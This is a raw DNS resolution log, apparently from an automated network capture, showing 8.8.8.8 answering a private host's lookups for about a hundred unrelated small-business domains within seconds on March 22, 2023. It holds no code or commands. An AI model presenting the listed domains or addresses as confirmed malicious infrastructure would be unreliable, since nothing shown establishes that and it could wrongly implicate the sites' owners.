Mar 22, 2023 05:43:29.306534052 CET	8.8.8.8	192.168.2.5	0xc0c9	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.120	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.437808990 CET	8.8.8.8	192.168.2.5	0x7f66	No error (0)	www.pcgrate.com		172.67.201.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.437808990 CET	8.8.8.8	192.168.2.5	0x7f66	No error (0)	www.pcgrate.com		104.21.66.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.438621044 CET	8.8.8.8	192.168.2.5	0x54da	No error (0)	www.synetik.net	synetik.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:29.438621044 CET	8.8.8.8	192.168.2.5	0x54da	No error (0)	synetik.net		193.166.255.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.459712029 CET	8.8.8.8	192.168.2.5	0x53ac	No error (0)	www.sjbs.org	sjbs.org		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:29.459712029 CET	8.8.8.8	192.168.2.5	0x53ac	No error (0)	sjbs.org		69.163.239.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.553163052 CET	8.8.8.8	192.168.2.5	0xfd77	No error (0)	www.waldi.pl	waldi.pl		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:29.553163052 CET	8.8.8.8	192.168.2.5	0xfd77	No error (0)	waldi.pl		46.242.238.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.645107985 CET	8.8.8.8	192.168.2.5	0x7aa4	No error (0)	www.ka-mo-me.com		211.1.226.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.647567987 CET	8.8.8.8	192.168.2.5	0x2068	No error (0)	www.aevga.com	aevga.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:29.647567987 CET	8.8.8.8	192.168.2.5	0x2068	No error (0)	aevga.com		108.167.164.216	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.929147959 CET	8.8.8.8	192.168.2.5	0x5a2b	No error (0)	www.holleman.us		51.79.51.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.938915968 CET	8.8.8.8	192.168.2.5	0x441d	Name error (3)	www.udesign.biz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.038614035 CET	8.8.8.8	192.168.2.5	0x337b	No error (0)	www.jacomfg.com		96.127.180.42	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.156832933 CET	8.8.8.8	192.168.2.5	0xc84d	No error (0)	www.gpthink.com		39.99.233.155	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.576982021 CET	8.8.8.8	192.168.2.5	0xbd1b	No error (0)	www.netcr.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:30.576982021 CET	8.8.8.8	192.168.2.5	0xbd1b	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:30.576982021 CET	8.8.8.8	192.168.2.5	0xbd1b	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.576982021 CET	8.8.8.8	192.168.2.5	0xbd1b	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.593058109 CET	8.8.8.8	192.168.2.5	0xcdbc	No error (0)	www.stnic.co.uk		77.68.50.105	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.619106054 CET	8.8.8.8	192.168.2.5	0xd7f	No error (0)	www.fink.com		69.163.218.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.641283035 CET	8.8.8.8	192.168.2.5	0x9a0	No error (0)	www.speelhal.net		217.19.237.54	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.659317970 CET	8.8.8.8	192.168.2.5	0x9a0	No error (0)	www.speelhal.net		217.19.237.54	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.687017918 CET	8.8.8.8	192.168.2.5	0xe2bb	No error (0)	www.maktraxx.com	maktraxx.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:30.687017918 CET	8.8.8.8	192.168.2.5	0xe2bb	No error (0)	maktraxx.com		72.44.93.236	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.819154024 CET	8.8.8.8	192.168.2.5	0x9d4f	No error (0)	www.com-sit.com		104.26.10.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.819154024 CET	8.8.8.8	192.168.2.5	0x9d4f	No error (0)	www.com-sit.com		172.67.70.223	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.819154024 CET	8.8.8.8	192.168.2.5	0x9d4f	No error (0)	www.com-sit.com		104.26.11.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.085280895 CET	8.8.8.8	192.168.2.5	0x9787	No error (0)	www.findbc.com		13.248.216.40	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.085280895 CET	8.8.8.8	192.168.2.5	0x9787	No error (0)	www.findbc.com		76.223.65.111	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.163790941 CET	8.8.8.8	192.168.2.5	0x5aa5	No error (0)	www.jchysk.com		208.97.178.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.259613991 CET	8.8.8.8	192.168.2.5	0x2cc5	Name error (3)	www.medisa.info	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.515909910 CET	8.8.8.8	192.168.2.5	0x86c2	No error (0)	www.reglera.com	reglera.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:31.515909910 CET	8.8.8.8	192.168.2.5	0x86c2	No error (0)	reglera.com		64.125.133.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.699861050 CET	8.8.8.8	192.168.2.5	0x51ad	No error (0)	www.cel-cpa.com		104.196.26.65	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.759386063 CET	8.8.8.8	192.168.2.5	0x810	No error (0)	www.mobilnic.net		154.203.14.100	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.861632109 CET	8.8.8.8	192.168.2.5	0xd1a1	No error (0)	www.lrsuk.com	language-recruitment.eu-2.volcanic.cloud		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:31.861632109 CET	8.8.8.8	192.168.2.5	0xd1a1	No error (0)	language-recruitment.eu-2.volcanic.cloud	d2kt7vovxa5e81.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:31.861632109 CET	8.8.8.8	192.168.2.5	0xd1a1	No error (0)	d2kt7vovxa5e81.cloudfront.net		65.9.95.105	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.861632109 CET	8.8.8.8	192.168.2.5	0xd1a1	No error (0)	d2kt7vovxa5e81.cloudfront.net		65.9.95.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.861632109 CET	8.8.8.8	192.168.2.5	0xd1a1	No error (0)	d2kt7vovxa5e81.cloudfront.net		65.9.95.109	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.861632109 CET	8.8.8.8	192.168.2.5	0xd1a1	No error (0)	d2kt7vovxa5e81.cloudfront.net		65.9.95.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.906465054 CET	8.8.8.8	192.168.2.5	0x7891	No error (0)	www.nqks.com	live.websites.hibu.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:31.906465054 CET	8.8.8.8	192.168.2.5	0x7891	No error (0)	live.websites.hibu.com	hibu-4.zenedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:31.906465054 CET	8.8.8.8	192.168.2.5	0x7891	No error (0)	hibu-4.zenedge.net	zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:31.906465054 CET	8.8.8.8	192.168.2.5	0x7891	No error (0)	zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.net	hibu34.inregion.waas.oci.oraclecloud.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:31.906465054 CET	8.8.8.8	192.168.2.5	0x7891	No error (0)	hibu34.inregion.waas.oci.oraclecloud.net		147.154.3.56	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.911308050 CET	8.8.8.8	192.168.2.5	0x3c1b	No error (0)	www.c9dd.com		188.166.152.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.591291904 CET	8.8.8.8	192.168.2.5	0xc917	No error (0)	www.kernsafe.com		172.67.72.98	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.591291904 CET	8.8.8.8	192.168.2.5	0xc917	No error (0)	www.kernsafe.com		104.26.3.124	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.591291904 CET	8.8.8.8	192.168.2.5	0xc917	No error (0)	www.kernsafe.com		104.26.2.124	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.602807045 CET	8.8.8.8	192.168.2.5	0xcb5c	No error (0)	www.dayvo.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.602807045 CET	8.8.8.8	192.168.2.5	0xcb5c	No error (0)	www.dayvo.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.736424923 CET	8.8.8.8	192.168.2.5	0xa590	No error (0)	www.myropcb.com		74.208.215.199	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.782799959 CET	8.8.8.8	192.168.2.5	0xa776	No error (0)	www.domon.com	meubles-domon.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:32.782799959 CET	8.8.8.8	192.168.2.5	0xa776	No error (0)	meubles-domon.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:32.782799959 CET	8.8.8.8	192.168.2.5	0xa776	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.855834961 CET	8.8.8.8	192.168.2.5	0x3088	No error (0)	www.usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.892832994 CET	8.8.8.8	192.168.2.5	0x4866	No error (0)	www.fe-bauer.de		3.65.101.129	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:33.502795935 CET	8.8.8.8	192.168.2.5	0x4f9a	No error (0)	www.stajum.com		103.3.1.161	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:33.529330015 CET	8.8.8.8	192.168.2.5	0xa71f	No error (0)	www.pwd.org	pwd.org		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:33.529330015 CET	8.8.8.8	192.168.2.5	0xa71f	No error (0)	pwd.org		208.109.214.162	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:33.562242031 CET	8.8.8.8	192.168.2.5	0x8ac1	No error (0)	www.pupi.cz		103.224.182.241	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:33.867520094 CET	8.8.8.8	192.168.2.5	0xe7f3	Name error (3)	www.koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:34.331468105 CET	8.8.8.8	192.168.2.5	0x23c2	No error (0)	www.ex-olive.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:34.359767914 CET	8.8.8.8	192.168.2.5	0x4fb0	No error (0)	www.yoruksut.com		93.187.206.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:35.043931007 CET	8.8.8.8	192.168.2.5	0xf65	No error (0)	www.wnsavoy.com		96.91.204.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:35.747859955 CET	8.8.8.8	192.168.2.5	0x6b55	No error (0)	www.ottospm.com	www.ottospm.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:36.875706911 CET	8.8.8.8	192.168.2.5	0xaf05	No error (0)	www.pdqhomes.com	traff-3.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:36.875706911 CET	8.8.8.8	192.168.2.5	0xaf05	No error (0)	traff-3.hugedomains.com	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:36.875706911 CET	8.8.8.8	192.168.2.5	0xaf05	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.19.116.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.875706911 CET	8.8.8.8	192.168.2.5	0xaf05	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.18.7.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.880755901 CET	8.8.8.8	192.168.2.5	0x17df	Name error (3)	www.wkhk.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.884666920 CET	8.8.8.8	192.168.2.5	0x1cf2	No error (0)	www.quadlock.com	quadlock.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:36.884666920 CET	8.8.8.8	192.168.2.5	0x1cf2	No error (0)	quadlock.com		70.39.251.249	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.888602018 CET	8.8.8.8	192.168.2.5	0xf8e6	No error (0)	www.dgmna.com	dgmna.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:36.888602018 CET	8.8.8.8	192.168.2.5	0xf8e6	No error (0)	dgmna.com		192.124.249.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.897495985 CET	8.8.8.8	192.168.2.5	0x830d	No error (0)	www.olras.com		80.93.82.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:37.105618954 CET	8.8.8.8	192.168.2.5	0x34b2	No error (0)	www.pr-park.com		118.27.125.181	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:37.116878986 CET	8.8.8.8	192.168.2.5	0x1114	No error (0)	www.baijaku.com	baijaku.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:37.116878986 CET	8.8.8.8	192.168.2.5	0x1114	No error (0)	baijaku.com		59.106.19.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.619318962 CET	8.8.8.8	192.168.2.5	0x6406	No error (0)	www.railbook.net		81.171.22.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.742712021 CET	8.8.8.8	192.168.2.5	0x30b0	No error (0)	www.fnw.us	fnw.us		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:38.742712021 CET	8.8.8.8	192.168.2.5	0x30b0	No error (0)	fnw.us		137.118.26.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.764306068 CET	8.8.8.8	192.168.2.5	0x8dd1	No error (0)	www.jenco.co.uk		104.21.23.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.764306068 CET	8.8.8.8	192.168.2.5	0x8dd1	No error (0)	www.jenco.co.uk		172.67.208.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.770905972 CET	8.8.8.8	192.168.2.5	0xdd20	Server failure (2)	www.ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.024930000 CET	8.8.8.8	192.168.2.5	0x6941	No error (0)	www.rs-ag.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.024930000 CET	8.8.8.8	192.168.2.5	0x6941	No error (0)	www.rs-ag.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.063669920 CET	8.8.8.8	192.168.2.5	0xbaf9	No error (0)	www.iamdirt.com	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:39.063669920 CET	8.8.8.8	192.168.2.5	0xbaf9	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:39.063669920 CET	8.8.8.8	192.168.2.5	0xbaf9	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.155637026 CET	8.8.8.8	192.168.2.5	0xfaba	No error (0)	www.valdal.com		104.26.7.221	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.155637026 CET	8.8.8.8	192.168.2.5	0xfaba	No error (0)	www.valdal.com		104.26.6.221	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.155637026 CET	8.8.8.8	192.168.2.5	0xfaba	No error (0)	www.valdal.com		172.67.73.176	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.171571970 CET	8.8.8.8	192.168.2.5	0x1072	No error (0)	www.alteor.cl	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:39.171571970 CET	8.8.8.8	192.168.2.5	0x1072	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:39.171571970 CET	8.8.8.8	192.168.2.5	0x1072	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.252432108 CET	8.8.8.8	192.168.2.5	0x2ad6	No error (0)	www.item-pr.com	item-pr.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:39.252432108 CET	8.8.8.8	192.168.2.5	0x2ad6	No error (0)	item-pr.com		185.15.129.58	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.252432108 CET	8.8.8.8	192.168.2.5	0x2ad6	No error (0)	item-pr.com		213.186.33.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.356034994 CET	8.8.8.8	192.168.2.5	0x3f2c	No error (0)	www.wifi4all.nl		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.356034994 CET	8.8.8.8	192.168.2.5	0x3f2c	No error (0)	www.wifi4all.nl		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.481003046 CET	8.8.8.8	192.168.2.5	0xd31d	No error (0)	www.vazir.se		206.191.152.37	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.491451979 CET	8.8.8.8	192.168.2.5	0x97b7	No error (0)	www.credo.edu.pl		62.122.190.121	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.506637096 CET	8.8.8.8	192.168.2.5	0x8ad2	No error (0)	www.elpro.si		104.26.14.53	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.506637096 CET	8.8.8.8	192.168.2.5	0x8ad2	No error (0)	www.elpro.si		172.67.70.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.506637096 CET	8.8.8.8	192.168.2.5	0x8ad2	No error (0)	www.elpro.si		104.26.15.53	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.510951042 CET	8.8.8.8	192.168.2.5	0xf310	No error (0)	www.depalo.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:39.510951042 CET	8.8.8.8	192.168.2.5	0xf310	No error (0)	ghs.googlehosted.com		142.250.186.179	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.527045012 CET	8.8.8.8	192.168.2.5	0x5613	No error (0)	www.fcwcvt.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.527045012 CET	8.8.8.8	192.168.2.5	0x5613	No error (0)	www.fcwcvt.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.549449921 CET	8.8.8.8	192.168.2.5	0xa969	No error (0)	www.mqs.com.br	www.mqs.com.br.cdn.gocache.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:39.549449921 CET	8.8.8.8	192.168.2.5	0xa969	No error (0)	www.mqs.com.br.cdn.gocache.net		170.82.173.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.549449921 CET	8.8.8.8	192.168.2.5	0xa969	No error (0)	www.mqs.com.br.cdn.gocache.net		170.82.174.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.766009092 CET	8.8.8.8	192.168.2.5	0x410	No error (0)	www.petsfan.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:39.766009092 CET	8.8.8.8	192.168.2.5	0x410	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:39.766009092 CET	8.8.8.8	192.168.2.5	0x410	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.766009092 CET	8.8.8.8	192.168.2.5	0x410	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.955027103 CET	8.8.8.8	192.168.2.5	0x17a	No error (0)	www.transsib.com	www.studyrussian.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:39.955027103 CET	8.8.8.8	192.168.2.5	0x17a	No error (0)	www.studyrussian.com	studyrussian.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:39.955027103 CET	8.8.8.8	192.168.2.5	0x17a	No error (0)	studyrussian.com		80.74.154.6	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.956830978 CET	8.8.8.8	192.168.2.5	0x348e	Name error (3)	www.owsports.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.963823080 CET	8.8.8.8	192.168.2.5	0x74fb	No error (0)	www.otena.com		99.83.154.118	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.966190100 CET	8.8.8.8	192.168.2.5	0xbb5b	No error (0)	www.tvtools.fi		104.21.88.198	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.966190100 CET	8.8.8.8	192.168.2.5	0xbb5b	No error (0)	www.tvtools.fi		172.67.152.159	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.040213108 CET	8.8.8.8	192.168.2.5	0x52c2	No error (0)	www.abart.pl	abart.pl		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:40.040213108 CET	8.8.8.8	192.168.2.5	0x52c2	No error (0)	abart.pl		89.161.163.246	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.152714968 CET	8.8.8.8	192.168.2.5	0x8010	No error (0)	www.snugpak.com		172.67.165.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.152714968 CET	8.8.8.8	192.168.2.5	0x8010	No error (0)	www.snugpak.com		104.21.73.182	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.480382919 CET	8.8.8.8	192.168.2.5	0x6fbb	No error (0)	www.photo4b.com		195.78.66.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.631423950 CET	8.8.8.8	192.168.2.5	0x663b	No error (0)	www.evcpa.com	evcpa.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:40.631423950 CET	8.8.8.8	192.168.2.5	0x663b	No error (0)	evcpa.com		192.124.249.10	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.637356997 CET	8.8.8.8	192.168.2.5	0x28b5	No error (0)	www.ora.ecnet.jp	ora.ecnet.jp		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:40.637356997 CET	8.8.8.8	192.168.2.5	0x28b5	No error (0)	ora.ecnet.jp		60.43.154.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.686378956 CET	8.8.8.8	192.168.2.5	0xb1fc	No error (0)	www.t-tre.com		135.181.73.98	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.730581045 CET	8.8.8.8	192.168.2.5	0x7f7b	No error (0)	www.crcsi.org	crcsi.org		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:40.730581045 CET	8.8.8.8	192.168.2.5	0x7f7b	No error (0)	crcsi.org		165.227.252.190	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.734978914 CET	8.8.8.8	192.168.2.5	0xe243	No error (0)	www.abdg.com		192.252.154.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.763801098 CET	8.8.8.8	192.168.2.5	0x6714	No error (0)	www.nelipak.nl		82.201.61.230	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.876228094 CET	8.8.8.8	192.168.2.5	0x82c9	No error (0)	www.naoi-a.com		202.254.236.40	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.147396088 CET	8.8.8.8	192.168.2.5	0x3cb3	No error (0)	www.hummer.hu	hummer.hu		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:41.147396088 CET	8.8.8.8	192.168.2.5	0x3cb3	No error (0)	hummer.hu		185.80.51.179	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.154287100 CET	8.8.8.8	192.168.2.5	0xc723	No error (0)	www.ora-ito.com		213.186.33.40	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.310874939 CET	8.8.8.8	192.168.2.5	0xeaa5	No error (0)	www.synetik.net	synetik.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:41.310874939 CET	8.8.8.8	192.168.2.5	0xeaa5	No error (0)	synetik.net		193.166.255.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.318489075 CET	8.8.8.8	192.168.2.5	0x86ca	No error (0)	www.cokocoko.com	traff-6.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:41.318489075 CET	8.8.8.8	192.168.2.5	0x86ca	No error (0)	traff-6.hugedomains.com	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:41.318489075 CET	8.8.8.8	192.168.2.5	0x86ca	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		18.119.154.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.318489075 CET	8.8.8.8	192.168.2.5	0x86ca	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		3.140.13.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.390086889 CET	8.8.8.8	192.168.2.5	0x3045	No error (0)	www.edimart.hu		81.2.194.241	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.516170979 CET	8.8.8.8	192.168.2.5	0x6b0c	No error (0)	www.waldi.pl	waldi.pl		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:41.516170979 CET	8.8.8.8	192.168.2.5	0x6b0c	No error (0)	waldi.pl		46.242.238.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.994999886 CET	8.8.8.8	192.168.2.5	0x45e1	No error (0)	www.pcgrate.com		172.67.201.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.994999886 CET	8.8.8.8	192.168.2.5	0x45e1	No error (0)	www.pcgrate.com		104.21.66.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.013768911 CET	8.8.8.8	192.168.2.5	0xa34f	Name error (3)	www.udesign.biz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.112667084 CET	8.8.8.8	192.168.2.5	0xd819	No error (0)	www.jacomfg.com		96.127.180.42	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.163495064 CET	8.8.8.8	192.168.2.5	0x6a87	No error (0)	www.xaicom.es	xaicom.es		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:42.163495064 CET	8.8.8.8	192.168.2.5	0x6a87	No error (0)	xaicom.es		188.165.133.163	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.175268888 CET	8.8.8.8	192.168.2.5	0x6a87	No error (0)	www.xaicom.es	xaicom.es		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:42.175268888 CET	8.8.8.8	192.168.2.5	0x6a87	No error (0)	xaicom.es		188.165.133.163	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.219280958 CET	8.8.8.8	192.168.2.5	0x38af	No error (0)	www.gpthink.com		39.99.233.155	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.301237106 CET	8.8.8.8	192.168.2.5	0x8479	No error (0)	www.speelhal.net		217.19.237.54	A (IP address)	IN (0x0001)	false
